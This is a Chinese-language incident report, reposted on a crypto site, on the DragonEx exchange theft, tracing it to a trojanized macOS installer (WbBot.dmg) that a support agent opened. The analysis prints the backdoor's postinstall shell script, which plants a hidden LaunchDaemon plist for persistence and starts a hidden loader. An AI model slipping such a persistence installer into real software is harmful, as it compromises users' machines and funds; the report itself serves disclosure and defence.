DragonEX交易所真相,被盗全过程还原

事件近日,DragonEx龙网交易所安全事件中,记者(johnwick.io)第一时间与龙网积极取得联系,与龙网一起分析和确认,客服曾经从陌生人处获取并打开了一个Apple OS X下“交易软件”安装包WbBot.dmg (SHA256哈希****7

事件


近日,DragonEx龙网交易所安全事件中,记者(johnwick.io)第一时间与龙网积极取得联系,与龙网一起分析和确认,客服曾经从陌生人处获取并打开了一个Apple OS X下“交易软件”安装包WbBot.dmg (SHA256哈希****7DEC218E815A6EB399E3B559A8962EE46418A4E765D96D352335********),此安装包经记者技术分析存在捆绑后门,黑客通过此安装包内后门获取内部人员权限渗透进内网进而成功获取数字货币钱包私钥。


分析

此dmg样本经过层层解包,最终层次结构如下:


其中的postinstall(绿色高亮)是后门的bash安装脚本,内容如下:



#! /bin/sh



mv /Applications/WbBot.app/Contents/Resources/.com.wbbot.plist/Library/LaunchDaemons/com.wbbot.plist



/Applications/WbBot.app/Contents/Resources/.loaderPackageValidate &



可见,该后门本体就是位于WbBot.app/Contents/Resources/.loader(蓝色高亮行,SHA256哈希:****107c09f591a11e5e347acad5b47c70ff5d5641a01647854643e0********)。



经过初步分析,确定为恶意后门。



小结



记者认为这是一次典型的专业级黑客攻击,记者正在积极配合龙网追踪被盗资产,目前已经联系多家交易所,对被盗资产进行冻结处理,关于此事件的更深入分析请关注记者的后续报告,同时提醒其他 数字货币 交易所以及个人用户提升安全意识并且采取必要的安全策略保护自身,不要轻易信任第三方用户。

声明:本文来自imtoken平台用户投稿,观点仅代表作者本人,不代表【imtoken-www.5798.com.cn】立场,文章内容仅供参考,如若转载请标注文章来源:【当前页面链接】

区块链相关

区块链媒体相关

区块链技术相关

挖矿相关

比特币相关